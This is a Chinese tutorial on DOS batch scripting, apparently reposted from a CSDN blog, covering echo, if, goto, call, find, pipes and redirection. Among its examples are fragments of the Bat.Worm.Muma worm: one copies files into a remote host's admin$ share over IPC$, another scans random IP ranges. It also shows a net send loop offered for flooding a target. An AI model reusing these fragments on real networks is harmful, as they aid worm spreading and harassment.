         OK,never claver and get to business(闲话少说言归正传)。批处理,也称为批处理脚本,英文译为BATCH,批处理文件后缀BAT就取的前三个字母。它的构成没有固定格式,只要遵守以下这条就ok了:每一行可视为一个命令,每个命令里可以含多条子命令,从第一行开始执行,直到最后一行结束,它运行的平台是DOS。批处理有一个很鲜明的特点:使用方便、灵活,功能强大,自动化程度高。我不想让自己写的教程枯燥无味,因为牵缠到代码(批处理的内容算是代码吧?)的问题本来就是枯燥的,很少有人能面对满屏幕的代码而静下心来。所以我会用很多简单实用的例子让读这篇教程的朋友去体会批处理的那四射的魅力,感受它那古灵精怪的性格,不知不觉中爱上批处理(晕,怎么又是爱?到底批处理和爱有什么关系?答案:没有!)。再说句“闲话”:要学好批处理,DOS基础一定要牢!当然脑子灵活也是很重要的一方面。

         例一、先给出一个最easy的批处理脚本让大家和它混个脸熟,将下面的几行命令保存为name.bat然后执行(以后文中只给出代码,保存和执行方式类似):

    ping sz.tencent.com > a.txt
    ping sz1.tencent.com >> a.txt
    ping sz2.tencent.com >> a.txt
    ping sz3.tencent.com >> a.txt
    ping sz4.tencent.com >> a.txt
    ping sz5.tencent.com >> a.txt
    ping sz6.tencent.com >> a.txt
    ping sz7.tencent.com >> a.txt
    exit

         是不是都能看的懂?是不是很easy?但它的作用却是很实用的,执行这个批处理后,可以在你的当前盘建立一个名为a.txt的文件,它里面记录的信息可以帮助你迅速找到速度最快的QQ服务器,从而远离“从服务器中转”那一痛苦的过程。这里>的意思,是把前面命令得到的东西放到后面所给的地方,>>的作用,和>的相同,区别是把结果追加到前一行得出的结果的后面,具体的说是下一行,而前面一行命令得出的结果将保留,这样可以使这个a.txt文件越来越大(想到如何搞破坏了??)。By the way,这个批处理还可以和其他命令结合,搞成完全自动化判断服务器速度的东东,执行后直接显示速度最快的服务器IP,是不是很爽?后面还将详细介绍。

    例二、再给出一个已经过时的例子(a.bat):

    @echo off
    if exist C:/Progra~1/Tencent/AD/*.gif del C:/Progra~1/Tencent/AD/*.gif
    a.bat

       为什么说这是个过时的例子呢?很简单,因为现在已经几乎没有人用带广告的QQ了(KAO,我的QQ还显示好友三围呢!!),所以它几乎用不上了。但曾经它的作用是不可小窥的:删除QQ的广告,让对话框干干净净。这里用的地址是QQ的默认安装地址,默认批处理文件名为a.bat,你当然可以根据情况自行修改。在这个脚本中使用了if命令,使得它可以达到适时判断和删除广告图片的效果,你只需要不关闭命令执行后的DOS窗口,不按CTRL+C强行终止命令,它就一直监视是否有广告图片(QQ也再不断查看自己的广告是否被删除)。当然这个脚本占用你一点点内存,呵呵。


    例三,使用批处理脚本查是否中冰河。脚本内容如下:

    @echo off
    netstat -a -n > a.txt
    type a.txt | find "7626" && echo "Congratulations! You have infected GLACIER!"
    del a.txt
    pause & exit

          这里利用了netstat命令,检查所有的网络端口状态,只需要你清楚常见木马所使用的端口,就能很easy的判断出来是否被人种了冰河。然这不是确定的,因为冰河默认的端口7626,完全可以被人修改。这里介绍的只是方法和思路。这里介绍的是方法和思路稍做改动,就变成可以检查其他木马的脚本了,再改动一下,加进去参数和端口及信息列表文件后,就变成自动检测所有木马的脚本了。呵呵,是不是很过瘾?脚本中还利用了组合命令&&和管道命令|,后面将详细介绍。

    例四,借批处理自动清除系统垃圾,脚本如下:

    @echo off
    if exist c:/windows/temp/*.* del c:/windows/temp/*.*
    if exist c:/windows/Tempor~1/*.* del c:/windows/Tempor~1/*.*
    if exist c:/windows/History/*.* del c:/windows/History/*.*
    if exist c:/windows/recent/*.* del c:/windows/recent/*.*

          将以上脚本内容保存到autoexec.bat里,每次开机时就把系统垃圾给自动删除了。这里需要注意两点:一、DOS不支持长文件名,所以就出现了Tempor~1这个东东;二、可根据自己的实际情况进行改动,使其符合自己的要求。  

          例五,先看一个实例。这是一个很有意思的脚本,一个小巧实用的好东东,把批处理“自动化”的特点体现的淋漓尽致。先介绍一下这个脚本的来历:大家都知道汇编程序(MASM)的上机过程,先要对源代码进行汇编、连接,然后再执行,而这中间有很多环节需要输入很多东西,麻烦的很(只有经历过的朋友才懂得)。如何使这个过程变的简单呢?在我们搞汇编课程设计时,我“被逼”写了这个脚本,用起来很爽,呵呵。看看脚本内容:

    @echo off
    ::close echo
    cls
    ::clean screen
    echo This programme is to make the MASM programme automate
    ::display info
    echo Edit by CODERED
    ::display info
    echo Mailto me : qqkiller***@sina.com
    ::display info
    if "%1"=="" goto usage
    ::if input without paramater goto usage
    if "%1"=="/?" goto usage
    ::if paramater is "/?" goto usage
    if "%1"=="help" goto usage
    ::if paramater is "help" goto usage
    pause
    ::pause to see usage
    masm %1.asm
    ::assemble the .asm code
    if errorlevel 1 pause & edit %1.asm
    ::if error pause to see error msg and edit the code
    link %1.obj & %1
    ::else link the .obj file and execute the .exe file
    :usage
    ::set usage
    echo Usage: This BAT file name [asm file name]
    echo Default BAT file name is START.BAT
    ::display usage

         先不要被这一堆的东西给吓怕了,静下心来仔细的看(回想一下第一章中第一段是怎么写的!!)。已经给出了每一行命令的解释,两个冒号后面的内容为前一行内容解释的E文(害怕E文的朋友也不用担心,都很easy,一看就懂了,实在不懂了不会查词典啊,这么懒?),在脚本执行时不显示,也不起任何作用。倒数第5行行首有一个冒号,可不是笔误哦!具体作用后面会详细讲到。此脚本中masm和link是汇编程序和连接程序,必须和edit程序以及你要编辑的源代码(当然还有这个脚本,废话!)一起在当前目录中。使用这个批处理脚本,可以最大可能的减少手工输入,整个过程中只需要按几下回车键,即可实现从汇编源代码到可执行exe文件的自动化转换,并具备智能判断功能:如果汇编时源代码出现错误(汇编不成功),则自动暂停显示错误信息,并在按任意键后自动进入编辑源代码界面;如果源代码汇编成功,则进行连接,并在连接后自动执行生成的exe文件。另外,由于批处理命令的简单性和灵活性,这个脚本还具备良好的可改进性,简单进行修改就可以符合不同朋友的上机习惯。正在学汇编的朋友,一定别忘了实习一下!

    在这个脚本中出现了如下几个命令:@、echo、::、pause、:和goto、%以及if。而这一章就将讲述这几个命令。

    1、@

         这个符号大家都不陌生,email的必备符号,它怎么会跑到批处理中呢?呵呵,不是它的错,批处理本来就离不开它,要不就不完美了。它的作用是让执行窗口中不显示它后面这一行的命令本身(多么绕口的一句话!)。呵呵,通俗一点说,行首有了它的话,这一行的命令就不显示了。在例五中,首行的@echo off中,@的作用就是让脚本在执行时不显示后面的echo off部分。这下懂了吧?还是不太懂?没关系,看完echo命令简介,自然就懂了。

    2、echo

          中文为“反馈”、“回显”的意思。它其实是一个开关命令,就是说它只有两种状态:打开和关闭。于是就有了echo on和echo off两个命令了。直接执行echo命令将显示当前echo命令状态(off或on)执行echo off将关闭回显,它后面的所有命令都不显示命令本身,只显示执行后的结果,除非执行echo on命令。在例五中,首行的@命令和echo off命令联合起来,达到了两个目的:不显示echo off命令本身,不显示以后各行中的命令本身。的确是有点乱,但你要是练习一下的话,3分钟包会,不会的退钱!

          echo命令的另一种用法一:可以用它来显示信息!如例五中倒数第二行,Default BAT file name is START.BAT将在脚本执行后的窗口中显示,而echo命令本身不显示(为什么??)。
          echo命令的另一种用法二:可以直接编辑文本文件。例六:


    echo netstat -A 192.168.0.1 > a.bat
    echo netstat -A 192.168.0.2 >> a.bat
    echo netstat -A 192.168.0.3 >> a.bat

    以上脚本内容的编辑方法是,直接是命令行输入,每行一回车。最后就会在当前目录下生成一个a.bat的文件,直接执行就会得到结果。

    3、::

          这个命令的作用很简单,它是注释命令,在批处理脚本中和rem命令等效。它后面的内容在执行时不显示,也不起任何作用,因为它只是注释,只是增加了脚本的可读性,和C语言中的/*…………*/类似。地球人都能看懂,就不多说了。

    4、pause

          中文为“暂停”的意思(看看你的workman上),我一直认为它是批处理中最简单的一个命令,单纯、实用。它的作用,是让当前程序进程暂停一下,并显示一行信息:请按任意键继续. . .。在例五中这个命令运用了两次,第一次的作用是让使用者看清楚程序信息,第二个是显示错误的汇编代码信息(其实不是它想显示,而是masm程序在显示错误信息时被暂它停了,以便让你看清楚你的源代码错在哪里)。

    5、:和goto

          为什么要把这两个命令联合起来介绍?因为它们是分不开的,无论少了哪个或多了哪个都会出错。goto是个跳转命令,:是一个标签。当程序运行到goto时,将自动跳转到:定义的部分去执行了(是不是分不开?)。例五中倒数第5行行首出现一个:,则程序在运行到goto时就自动跳转到:标签定义的部分执行,结果是显示脚本usage(usage就是标签名称)。不难看出,goto命令就是根据这个冒号和标签名称来寻找它该跳转的地方,它们是一一对应的关系。goto命令也经常和if命令结合使用。至于这两个命令具体用法,参照例五。

    goto命令的另一种用法一:提前结束程序。在程序中间使用goto命令跳转到某一标签,而这一标签的内容却定义为退出。如:

    ……
    goto end
    ……
    :end

    这里:end在脚本最后一行!其实这个例子很弱智,后面讲了if命令和组合命令你就知道了。

    6、%

          这个百分号严格来说是算不上命令的,它只是批处理中的参数而已(多个%一起使用的情况除外,以后还将详细介绍),但千万别以为它只是参数就小看了它(看看例五中有多少地方用到它?),少了它批处理的功能就减少了51%了。看看例七:

    net use //%1/ipc$Content$nbsp;%3 /u:"%2"
    copy 11.BAT //%1/admin$/system32 /y
    copy 13.BAT //%1/admin$/system32 /y
    copy ipc2.BAT //%1/admin$/system32 /y
    copy NWZI.EXE //%1/admin$/system32 /y
    attrib //%1/admin$/system32/10.bat -r -h -s

          以上代码是Bat.Worm.Muma病毒中的一部分,%1代表的IP,%2代表的username,%3代表password。执行形式为:脚本文件名 参数一 参数二 ……。假设这个脚本被保存为a.bat,则执行形式如下:a IP username password。这里IP、username、password是三个参数,缺一不可(因为程序不能正确运行,并不是因为少了参数语法就不对)这样在脚本执行过程中,脚本就自动用用你的三个参数依次(记住,是依次!也是一一对应的关系。)代换1%、2%和3%,这样就达到了灵活运用的目的(试想,如果在脚本中直接把IP、username和password都定义死,那么脚本的作用也就被固定了,但如果使用%的话,不同的参数可以达到不同的目的,是不是更灵活?)。

          关于这个参数的使用,在后续章节中还将介绍。一定要非常熟练才行,这需要很多练习过程,需要下点狠工夫!

          这一章就写到这里了。可能有朋友问了:怎么没介绍if命令?呵呵,不是我忘了,而是它不容易说清楚,下一章再讲了!这一章讲的这点东西,如果你是初学者,恐怕也够消化的了。记住一句话:DOS是批处理的BODY,任何一个DOS命令都可以被用在批处理脚本中去完成特定的功能。到这里,你是否已经想到了用自己肚子里的东西去写点带有自动化色彩的东东呢?很简单,就是一个DOS命令的集合而已,相信  自称为天才的你已经会把计算机等级考试上机试题中的DOS部分用批处理来自动化完成了。

          烦!就好象一个半老女人到了更年期,什么事都想唠叨几句,什么事都感到不舒服,看谁谁不爽。明知山有虎,偏向虎山行,最后留下一身伤痕无功而返时,才发现自己竟然如此脆弱,如此渺小,如此不堪一击。徘徊在崩溃的边缘,突然回想起了自己最后一次扁人的那一刻,还真有点怀念(其实我很不喜欢扁人,更不喜欢被人扁)。我需要发泄,我用手指拼命的敲打着键盘,在一阵接一阵有节奏的声音中,屏幕上出现了上面的这些文字。可难道这就是发泄的另一种方式吗?中国人还是厉害,早在几千年前孔老夫子就说过“唯女子与小人,难养也”,真**有先见之明,佩服!虽然是在发泄,不过大家请放心,以我的脾气,既然决定写这篇教程,就一定会尽力去写好,写完美,绝对不给自己留下遗憾,要不这教程就不是我写的!
          曾经有一篇经典的批处理教程出现在你的屏幕上,你没有保存,直到找不到它的链接你才后悔莫及,人世间最大的痛苦莫过于此。如果上天能给你一个再看一次的机会,你会对那篇教程说三个字:我爱你!如果非要给这份爱加上一个期限,你希望是100年。因为100年后,你恐怕早已经挂了!而现在,你的屏幕上出现了这篇你正在看的批处理教程,虽然不如你曾经看的那篇经典,但如果勉强还过的去。你会爱它吗?时间会有50年那么长吗?答案是:试试看吧。

          批处理脚本中最重要的几个命令,将在这一章详细介绍,但是很遗憾,有些细节到现在我都没掌握的很好,甚至还有些生分。如同还不太懂得爱一样。但我一直都在努力,即使一直都没有收获。所以可能讲的会比较笼统,但我会告诉你方法,剩下的就是时间问题了,需要自己去磨练。让我们共同努力吧。冰冻三尺非一日之寒,滴水穿石非一日之功。有些事情,比如学批处理,比如爱一个人,都是不能速成的,甚至还会有付出艰辛而收获为甚微的情况。再次重申,看这篇教程的时候,一定要静下心来,除非你已经掌握了这篇教程的所有东西----但那也就不必看了,浪费时间!

    7、if

          接上一章,接着讲if命令。总的来说,if命令是一个表示判断的命令,根据得出的每一个结果,它都可以对应一个相应的操作。关于它的三种用法,在这里分开讲。

    (1)、输入判断。还是用例五里面的那几句吧:

    if "%1"=="" goto usage
    if "%1"=="/?" goto usage
    if "%1"=="help" goto usage

          这里判断输入的参数情况,如果参数为空(无参数),则跳转到usage;如果参数为/?或help时(大家一般看一个命令的帮助,是不是输入的/?或help呢,这里这么做只是为了让这个脚本看起来更像一个真正的程序),也跳转到usage。这里还可以用否定形式来表示“不等于”,例如:if not "%1"=="" goto usage,则表示如果输入参数不为空就跳转到usage(实际中这样做就没意义了,这里介绍用法,管不了那么多了,呵呵。)是不是很简单?其实翻译成中文体会一下就understand了。

    (2)、存在判断。再看例二里这句:

          if exist C:/Progra~1/Tencent/AD/*.gif del C:/Progra~1/Tencent/AD/*.gif

    如果存在那些gif文件,就删除这些文件。当然还有例四,都是一样的道理。注意,这里的条件判断是判断存在的,当然也可以判断不存在的,例如下面这句“如果不存在那些gif文件则退出脚本”:if not exist C:/Progra~1/Tencent/AD/*.gif exit。只是多一个not来表示否定而已。

    (3)、结果判断。还是拿例五开刀(没想到自己写的脚本,竟然用处这么大,呵呵):

    masm %1.asm
    if errorlevel 1 pause & edit %1.asm
    link %1.obj

          先对源代码进行汇编,如果失败则暂停显示错误信息,并在按任意键后自动进入编辑界面;否则用link程序连接生成的obj文件。这里只介绍一下和if命令有关的地方,&命令后面会讲到。这种用法是先判断前一个命令执行后的返回码(也叫错误码,DOS程序在运行完后都有返回码),如果和定义的错误码符合(这里定义的错误码为1),则执行相应的操作(这里相应的操作为pause & edit %1.asm部分)。

    另外,和其他两种用法一样,这种用法也可以表示否定。用否定的形式仍表达上面三句的意思,代码变为:

     

    masm %1.asm
    if not errorlevel 1 link %1.obj
    pause & edit %1.asm

         看到本质了吧?其实只是把结果判断后所执行的命令互换了一下,“if not errorlevel 1”和“if errorlevel 0”的效果是等效的,都表示上一句masm命令执行成功(因为它是错误判断,而且返回码为0,0就表示否定,就是说这个错误不存在,就是说masm执行成功)。这里是否加not,错误码到底用0还是1,是值得考虑的两个问题,一旦搭配不成功脚本就肯定出错,所以一定要体会的很深刻才行。如何体会的深刻?练习!自己写一个脚本,然后把有not和没有not的情况,返回码为0或1的情况分别写进去执行(怎么,嫌麻烦啊?排列组合算一下才四中情况你就嫌麻烦了?后面介绍管道命令和组合命令时还有更麻烦的呢!怕了?呵呵。),这样从执行的结果中就能很清楚的看出这两种情况的区别。

          这种用errorlevel结果判断的用法是if命令最难的用法,但也恰恰是最有用的用法,如果你不会用errorlevel来判断返回码,则要达到相同的效果,必须用else来表示“否则”的操作,是比较麻烦的。以上代码必须变成:

    masm %1.asm
    if exist %1.obj link %1.obj
    else pause & edit %1.asm

          关于if命令的这三种用法就say到这里,理解很简单,但应用时就不一定用的那么得心应手,主要是熟练程度的问题。可能有的朋友有点惊讶,我怎么没给出类似下面三行的用法介绍,是因为下面三行是if命令帮助里对它自身用法的解释,任何人只要一个“if /?”就能看到,我没有必要在这里多费口舌;更重要的原因,是我觉得这样介绍的不清楚,看的人不一定看的懂,所以我采用上面自己对if命令的理解来介绍。一定要注意的是,这三种用法的格式各不相同,而且也是不能改变的,但实际上可以互换(以为从本质上讲,这三种用法都是建立在判断的基础上的,哲学教我们学会透过现象看事物本质!)。有兴趣的朋友可以自己研究一下。

    IF [NOT] ERRORLEVEL number do command
    IF [NOT] string1==string2 do command
    IF [NOT] EXIST filename do command
    8、call

          学过汇编或C的朋友,肯定都知道call指令表示什么意思了,在这里它的意思其实也是一样的。在批处理脚本中,call命令用来从一个批处理脚本中调用另一个批处理脚本。看例八(默认的三个脚本文件名分别为start.bat、10.bat和ipc.bat):

    start.bat:
    ……
    CALL 10.BAT 0
    ……

    10.bat:
    ……
    ECHO %IPA%.%1 >HFIND.TMP
    ……
    CALL ipc.bat IPCFind.txt

    ipc.bat:
    for /f "tokens=1,2,3 delims= " %%i in (%1) do call HACK.bat %%i %%j %%k

          有没有看出什么不对的地方?没看出来啊?没看出来就对了,其实就没有不对的地方嘛,你怎么看的出来!从上面两个脚本,你可以得到如下信息:1、脚本调用可以灵活运用,循环运用、重复运用。2、脚本调用可以使用参数!关于第一点就不多说了,聪明的你一看就应该会,这里说一下第二点。

          在start.bat中,10.bat后面跟了参数0,在执行时的效果,其实就是把10.bat里的参数%1用0代替。在start.bat中,ipc.bat后面跟了参数ipcfind.txt(一个文件,也可以做参数),执行时的效果,就是用ipc.bat中的每一行的三个变量(这里不懂没关系,学过for命令后就懂了),对应代换ipc.bat中的%%i、%%j和%%k。这里参数调用是非常灵活的,使用时需要好好体会。在初学期间,可以先学习只调用脚本,至于连脚本的参数一起使用的情况,在后面的学习中自然就会有比较深刻的理解,这是因为当你已经可以灵活运用批处理脚本后,如何使代码写的更精简更完美更高效就自然包括到了考虑的范围,这时候你就会发现在调用脚本时直接加入参数,可以使代码效率加倍。By the way,上面的这几个脚本,都是Bat.Worm.Muma病毒的一部分,在后面的教程里,大家将有机会见到这个病毒的真面目。
          那是不是说,在同一个目录下至少存在两个批处理脚本文件(只有一个你调用谁?)?呵呵,注意了,这句话错了!!只有一个照样可以调用----调用自身!看例九(默认脚本文件名a.bat):

    net send %1 This is a call example.
    call a.bat

          这两句一结合,效果自然不怎么样,因为只有一台机器来发消息,谁怕谁啊?我给你来个礼尚往来!可如果有100台机器同时执行,而且每台机器开10和窗口同时向一个目标机器发消息的话,呵呵。这里call a.bat的作用就是调用自身,执行完前一句net send命令后再调用自身,达到了循环执行的目的。

          给出一个很有意思的脚本,有兴趣的朋友可以实验一下。例十(默认脚本文件名为a.bat):

    call a.bat

          一定要在DOS窗口下执行,否则只会看到一个窗口一闪而过,看不到最后结果。等执行完后,当脚本被执行了1260次,别忘了想一下到底是为什么!爱情有时候跟这个脚本一样,一旦陷入死循环,最后的结果都是意想不到的。只是爱情,绝对不会等到被毫无理由的循环这么多次,也许在第三次时就出现了love is aborted的提示。

    9、find

          这是一个搜索命令,用来在文件中搜索特定字符串,通常也作为条件判断的铺垫程序(我怎么突然想起了这四个字?)。这个命令单独使用的情况在批处理中是比较少见的,因为没什么实际意义。还是借例三来说明:

    @echo off
    netstat -a -n > a.txt
    type a.txt | find "7626" && echo "Congratulations! You have infected GLACIER!"
    del a.txt
    pause & exit

          先用netstat命令检查是否有冰河默认的端口7626在活动,并把结果保存到a.txt中。然后使用type命令列出a.txt中的内容,再在列出的内容中搜索字符串“7626” ,发现有的话则提示中了冰河,否则退出。看,find命令其实就这么简单,但有一点必须要注意到:如果不使用type命令列出a.txt中的内容,而是直接使用find命令在a.txt中找“7626”(find a.txt "7626" && echo "Congratulations! You have infected GLACIER!"),就必须得给出这个a.txt的绝对路径(我试过了,find并没有默认路径就是当前路径的功能,必须手动指定。也许是我错了,欢迎指正)。因为在find命令的帮助里有这么一句话:如果没有指定路径,find将搜索键入的或者由另一个命令产生的文字。这里的“另一个命令”自然就指的type命令了。

          至于find命令的其他几个参数如v、n、i等,有兴趣的朋友自己去研究吧,这已经属于DOS学习的内容了,这里就不做介绍。关于find命令和其他命令的一些更精妙的用法(有些简直令人叫绝),后续的教程中将介绍,希望关注。

    10、for、set、shift

          为什么把这三个命令放到一起来讲?原因除了我说明外,恐怕谁也想不到!很简单的一句话:其实我也不太懂!是的,对于这两个命令,我是从研究Bat.Worm.Muma病毒开始学习的,时间过去了不少,但还是没完全搞明白,我怕讲出来连自己都看不懂,我更怕不小心讲错了成了罪人。所以我给出一个脚本去告诉你,如何让这两个命令给自己留一个初步的印象,其实也就是这两个命令的入门,而并不是说如何领会这两个命令。因为要领会如此精妙的两个命令(特别是for)谈何容易!也许你会表扬我说我诚实、不懂就不懂;也许你会骂我,让我既然不懂就赶紧滚蛋,不要在这里丢人显眼;也许你还会说一些别的这样那样好听或不好听的话,都随便你了,即使我不同意你说的话,我也会誓死捍卫你说话的权利。看例十一:

    @echo off
    for /? > for.txt
    set /? > set.txt
    shift /? >shift.txt
    exit

          执行后在当前路径下就生成for.txt、set.txt和shift.txt三个文件,里面分别记录了for命令、set命令和shift命令的帮助信息。地球人都能看懂,我就不多说了。我在网上曾经找了很长时间这三个命令的教程,但都不理想,基本都是照搬的帮助信息。我想在自己完全掌握了这两个命令后,一定要写一篇用自己的文字总结出来的for、set和shift教程(关于shift命令,后面介绍批处理的参数时还将涉及到),一定会的,这是我的心愿之一!需要注意的一点是,这三个命令的帮助里 ,介绍的都比较死板,虽然也举了一些例子,但这是远远不够的。要掌握这两个命令,最需要的就是耐心!没写错,就是耐心。光是认真看完它们的帮助文字就已经需要足够的耐心了,要进一步练习领会这两个命令,难道不需要更大的耐心?实战练习的机会我会留给你的,关键还是那句话,看你有没有耐心去研究了。看看例十二:

    START.BAT:
    CALL MUMA.BAT
    SET IPA=192.168
    CALL 10.BAT 0
    :NEARAGAIN
    netstat -n|find ":" >A.TMP
    FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
    :START
    CALL RANDOM.BAT
    IF "%NUM1%"=="255" GOTO NEARAGAIN
    IF "%NUM1%"=="192" GOTO NEARAGAIN
    IF "%NUM1%"=="127" GOTO NEARAGAIN
    IF "%NUM2%"=="255" GOTO NEARAGAIN
    IF "%NUM3%"=="255" GOTO NEARAGAIN
    IF "%NUM4%"=="255" GOTO NEARAGAIN
    SET IPA=%NUM1%.%NUM2%
    ECHO START > A.LOG
    PING %IPA%.%NUM3%.1>B.TMP
    PING %IPA%.%NUM3%.%NUM4%>>B.TMP
    FIND /C /I "from" B.TMP
    IF ERRORLEVEL 1 GOTO START
    CALL 10.BAT %NUM3%
    DEL A.LOG
    GOTO START

          这是Bat.Worm.Muma病毒的起始脚本,设置了病毒运行的环境变量。是不是看的头都大了?又忘了写在第一章第一段的那句话(静下心来!),你应该能体会到学习这两个命令所需要的耐心了吧。就如同去爱一个人,你得学会宽容,打不得骂不得,用你宽大的胸怀去包容她的一切,即使你发现爱她的过程如看上面代码的过程一样让你头大,但你还是得爱下去----爱需要理由吗?不需要吗?需要吗?不需要吗……等到风平浪静后,最直观的收获就是,你的耐心变的前所未有的充足,面对她的复杂和善变,你自己会处变不惊,以自己的方式去从容应付曾经应付不了的场面,即使到最后一身伤痕,也会感慨曾经的举动有多么伟大。

          没错,这就是批处理的魅力,这就是爱的魅力。让你受了伤还感谢伤你的人。这种感觉就好象在自己最喜欢的音乐声中被人强奸,痛并快乐着。

          不得不再次重申一遍,各种DOS命令是批处理的BODY(我实在找不出一个更合适的词来形容他们之间的关系),学好DOS命令是学好批处理的前提。其他DOS命令如copy、dir、del、type、path、break、start等内部命令,以及ping、net、cmd、at、sort、attrib、fc、find等外部命令,在批处理里的应用非常广泛。这篇教程的作用,是教你认识批处理,以及如何利用DOS命令组合出来一个完美的批处理脚本,去让它自动完成你想要它做的事情。而灵活自如的编辑一个批处理脚本是建立在熟练掌握DOS命令的基础上的,这已经超出了本文的范畴,在此就不赘述了。

          不知不觉中第三章已经结束了。耳麦里传来的依然是陈晓东的《比我幸福》,每隔4分32秒就自动重播。虽然我不并不很喜欢陈晓东,可这并不妨碍我喜欢音乐,喜欢这首描写的如此让人感慨的歌。请你一定要比我幸福/才不枉费我狼狈退出/再痛也不说苦/爱不用抱歉来弥补/至少我能成全你的追逐/请记得你要比我幸福/才值得我对自己残酷/我默默的倒数/最后再把你看清楚/看你眼里的我好馍糊/慢慢被放逐。我如同一个因年老失色而拉不到客的老妓女,绝望的徘徊在曾经辉煌的红灯区,用一脸的木然瞟一眼来来去去的人群,默默的回忆自己并不光彩的过去,幻想自己将要面对的未来。直到看见那些幸福依偎在一起的情侣们,才突然间发现上帝的公平,和这种公平的残忍。


           可以说,批处理脚本中最重要的几个命令我都没有给出如echo或if那样比较详细的介绍,原因我已经说了,因为我也是个菜,我也不太懂----但我正在学!你呢?今天又去了一趟图书馆,淘金一样发现了一本叫《DOS批文件》的东东,藏在一个角落里落满了灰,五本摞一起就跟砖头一样厚了。大概翻了一下,里面介绍了很多比较底层和基础的东西,虽然从思路上讲,已经有点time out了,很多东西已经基本没有利用的价值(这就是信息时代的更新速度),但还是很值得看的。于是打算下午淘过来,放假回去了再好好研究一番,连同那几个不熟悉的命令一起搞熟了,再续写这篇教程。我始终坚信,没有最好只有更好。

          但是很可惜,等到下午再去的时候,图书馆楼梯口已经立了一个牌子,上面写着out of service----人家这学期的工作结束了。于是回到宿舍打算继续写第四章,正在这时又得到一个“振奋人心”的消息:期末考试有一科挂了,而且是全班第一----这一门整个班里就挂了我一个。郁闷的情绪刹那间涌上心头,整个世界仿佛都变成黑的了。食堂和小卖部已经陆续关门,学校里的人越来越少,迎面过来的几个同学也都一身行李,忙碌着准备回家过年,内心的孤寂和失落如同夏日里暴雨前的乌云,迅速而不可抗拒的占领了心里每一个角落。迎着一月的冷风我一个人在天桥上发呆,还能怎么样,连期末考试都应付不了的失败男人。

          “课间休息”时间好象长了点,呵呵,上课了!从这一章开始,将详细介绍批处理中常用的几个组合命令和管道命令。这些命令虽然不是必须的,如同爱一个人时不一定非得每天去陪,但如果少了这个过程,事情就会变的复杂而不完美,所以我认为管道命令和组合命令是批处理的调味剂,几乎是少不了的。

    下面从管道命令讲起。常用的管道命令有以下这些:|、>、>>

    11、|

          这个命令恐怕大家不是很陌生,经常操作DOS的朋友都应该知道,当我们查看一个命令的帮助时,如果帮助信息比较长,一屏幕显示不完时DOS并不给我们时间让我们看完一屏幕再翻到另一屏幕,而是直接显示到帮助信息的最后。如在提示符下输入help回车时,就会看到当前DOS版本所支持的所有非隐含命令,但你只能看到最后的那些命令,前面的早就一闪而过了,如何解决这个问题?看例十三:

    help | more

           回车后会发现显示满一屏幕后就自动暂停,等候继续显示其他信息。当按写回车时,变成一个一个的出现;按下空格键时一屏幕一屏幕显示,直到全部显示完为止;按其他键自动停止返回DOS。

    为什么会出现上述现象?答案很简单,这里结合了管道命令|和DOS命令more来共同达到目的的。这里先简单介绍一下help命令和more命令,对理解|命令的用法有很大帮助。

    11.1、help命令。其实这个命令是不需要多说的,但在上述例子中help命令的用法比较特殊,直接在DOS提示符下输入help命令,结果是让DOS显示其所支持的所有非隐含命令,而在其他地方用help命令,如输入net help回车,则是显示net命令的帮助信息。

    11.2、more命令。可能很多朋友以前就没有接触过这个命令,这个命令在Linux下的用处非常广泛,也是管道命令之一。大家可以找一篇比较长的文章(a.txt)在DOS提示符下输入如下两个命令去比较一下差别:more a.txt和type a.txt。利用more命令,可以达到逐屏或逐行显示输出的效果,而type命令只能一次把输出显示完,最后的结果就是只能看到末尾的部分。在例十三里,more命令的作用就是让输出的信息逐屏或逐行显示。
          看到这里,你是否已经能隐约感受到了|命令的作用了?没错,它的作用,就是把前一命令的输出当后一命令的输入来用的。在例十三里,前一命令的输出,就是help命令执行后显示的DOS所支持的所有非隐含命令,而这个结果刚好做了后一命令more的输入。所以例十三和下面的例十四是等效的:

    help > a.txt
    more a.txt
    del a.txt

          这里利用另一管道命令>生成了一个a.txt文件作为中间环节,在用more命令查看a.txt文件后再删除a.txt文件(例十三的所有操作是在内存中进行的,不生成文件)。可以看出,正确使用管道命令|可以带来事半功倍的效果。

    结合例十三和例十四,以及前面的例九再体会一遍:|命令的作用,就是让前一命令的输出当做后一命令的输入。

    12、>、>>

          这两个命令的效果从本质上来说都是一样的,他们都是输出重定向命令,说的通俗一点,就是把前面命令的输出写入到一个文件中。这两个命令的唯一区别是,>会清除掉原有文件中的内容后把新的内容写入原文件,而>>只会另起一行追加新的内容到原文件中,而不会改动其中的原有内容。例十五:

    echo @echo off > a.bat
    echo echo This is a pipeline command example. >> a.bat
    echo echo It is very easy? >> a.bat
    echo echo Believe your self! >> a.bat
    echo pause >> a.bat
    echo exit >> a.bat

    依次在DOS提示符下输入以上各行命令,一行一个回车,将在当前目录下生成一个a.bat文件,里面的内容如下:

    @echo off
    echo This is a pipeline command example.
    echo It is very easy?
    echo Believe your self!
    pause
    exit

           看到这里,你得到了多少信息?1、可以直接在DOS提示符下利用echo命令的写入功能编辑一个文本,而不需要专门的文本编辑工具;2、管道命令>和>>的区别如上所述。如果这里只用>命令来完成上面操作,最后也会生成一个a.bat,但里面的内容就只剩下最后一行exit了。所以>和>>一般都联合起来用,除非你重定向的输出只有一行,那么就可以只用>了。结合例一再仔细体会输出重定向管道命令>和>>的用法。

    13、<、>&、<&

            这三个命令也是管道命令,但它们一般不常用,你只需要知道一下就ok了,当然如果想仔细研究的话,可以自己查一下资料。

    <,输入重定向命令,从文件中读入命令输入,而不是从键盘中读入。
    >&,将一个句柄的输出写入到另一个句柄的输入中。
    <&,刚好和>&相反,从一个句柄读取输入并将其写入到另一个句柄输出中。

    关于这三个管道命令的举例,在后面批处理脚本的精妙应用中还将涉及到。

    本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/sptoor/archive/2009/09/18/4568009.aspx

    本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/sptoor/archive/2009/09/18/4568009.aspx

    本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/sptoor/archive/2009/09/18/4568009.aspx

    展开全文
  • windows Shell 脚本语法

    千次阅读 2017-06-12 19:55:33
    windows Shell 脚本语法 扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。 ==== 注 ======================================= .bat是dos下的批处理文件 .cmd是nt内核命令行环境的另种...

    windows Shell 脚本语法
